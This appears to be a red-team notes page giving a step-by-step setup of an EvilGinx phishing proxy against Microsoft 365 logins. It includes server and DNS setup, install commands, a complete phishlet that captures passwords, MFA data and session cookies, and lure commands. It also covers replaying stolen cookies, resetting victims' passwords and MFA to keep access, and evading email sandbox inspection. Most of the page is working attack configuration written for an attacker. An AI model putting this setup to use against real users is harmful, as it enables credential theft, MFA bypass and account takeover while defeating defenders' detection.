👺

EvilGinx Phishing Campaign Setup

Steps

Create a Server

  • Easiest way is a Kali Linux AWS EC2 or Digital Ocean Droplet. Ensure Port 443 is Open on this host. If we know what IP or IP range our target will visit from, we can really lock this down with firewall rules restricting access to specified subnets.

Register Domain

  • Easy domain registration through AWS Route53. Alternatively, we can register through GoDaddy, Crazy Domains or any other reputable provider.
  • Ensure Correct DNS records. For example, if we register a domain attacker.com and we proxying Microsoft login. We might create the following records:
login.microsoftonline.attacker.com
A
<servers_ipv4>
www.microsoftonline.attacker.com
A
<servers_ipv4>

EvilGinx Setup

  • Install EvilGinx (with apt in kali)
sudo apt update
sudo apt install -y evilginx2
  • Create our Microsoft Phishlet

~/.evilginx/phishlets/microsoft365.yaml (https://github.com/BakkerJan/evilginx3/blob/main/microsoft365.yaml):

name: 'Microsoft 365'
author: 'Jan Bakker'
min_ver: '3.1.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false, auto_filter: true}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
    type: 'cookie'
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password|accesspass)'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'mfaAuthMethod'
      search: '(.*)'
      type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'
  • This may need modification to keep up to date with latest techniques and Microsoft OAuth flow

Configure and Start EvilGinx Server

To avoid server terminating due to loss of SSH connection we will use TMUX and script so we can log our activity:

# Launch a new tmux session
tmux new -s evilginx
# Detach from tmux session when needed
ctrl+b, d
# Rejoin tmux session
tmux attach -t evilginx
# Start session logging
script -a ~/.evilginx/session.log
# Stop logging when done
exit

Within the tmux session with session logging, we will start and configure the server:

# Start server, refrencing folder containing our phishlets
evilginx2 -p ~/.evilginx/phishlets/

# Link domain
config domain microsoftonline.attacker.com

# Link IP
config ipv4 external <servers_public_ipv4>

# Create a redirect URL for blacklisted visitors (source IP's in ~/.evilginx/blacklist.txt)
config unauth_url https://login.microsoftonline.com

# List available phislets
phishlets # This should return one phishlet called microsoft365 based on our yaml file name

# Link the hostname to the phishlet
phishlets hostname microsoft365 microsoftonline.attacker.com

# Enable Phishlet (This will get certificates for our phishing subdomains and start hosting the site
phishlets enable microsoft365

Setup our phishing links

Evilginx uses Lures as individual phishing links. They will be in the format of login.microsoftonline.attacker.com/<GUI> . We should create an individual lure for each target to keep track on which target has clicked their link.

# Create Lure for microsoft365 phishlet
lures create microsoft365

# List lures
lures

# Get a URL for a lure from the list
lures get-url 0

Receiving a session token

  • If a visitor clicks on a link it will start a session where their activity will be logged (username, password entered, mfa completed, session token captured. This will appear in the logged output but can be reviewed with:
# View sessions list
sessions

# View captured data for specified session
sessions <id>
  • Once you have a valid session token you can visit login.microsoftonline.com and load the JSON into cookie editor and refresh. You should be redirected to m365 signed in as the target.
  • From there, you can reset their password and MFA to persist on the account, or continue stealthily to enumerate the M365 environment.
  • If resetting MFA or password, best to do outside of business hours (example Friday Night), as this will quickly be caught and remediation efforts commenced.

OPSEC

Most email providers will perform link URL inspection and sandboxing (example Microsoft Safe Links). We can mitigate this with multiple strategies:

  1. Pause lure when sending phishing link. When lure is paused, all requests, even legitimate ones to the lure URL will be redirected to the unauth-url. The email sandbox will just see a redirect:
# Pause specified lures for 10 minutes (can specify days hours minutes and seconds like 1d2h13m30s)
lures pause <id> 10m

# Unpause lure after you are satisfied the sandbox checks are completed
lures unpause <id>
  1. Use Link obfuscation techniques. For example:
    1. We can use URL Shorteners (owo.vc is a good one that doesn’t require registration and doesn’t perform any sandboxing themselves)
    2. Set up an intermediary server with a redirect to the phishing server when conditions are met. Example JavaScript to do this can be:

Practical Example

Example landing page, uses anti-sandbox techniques to detect headless browsers and look for mouse movement or touch movement. Takes the lure URL’s extension (#abc123) and waits for a user to move their mouse over the page to confirm human interaction before redirecting to the actual URL. We can obfuscate this JavaScript further so that the malicious link can not be read by automated tools (Currently uses Base64).

Note: This page should be hosted on a different URL to the malicious link URL.

image
‣
Code:
‣
Server requests when Microsoft Safe Link performs sandbox inspection
‣
Server requests when link is clicked from outlook with Mimecast running
SuperMade with Super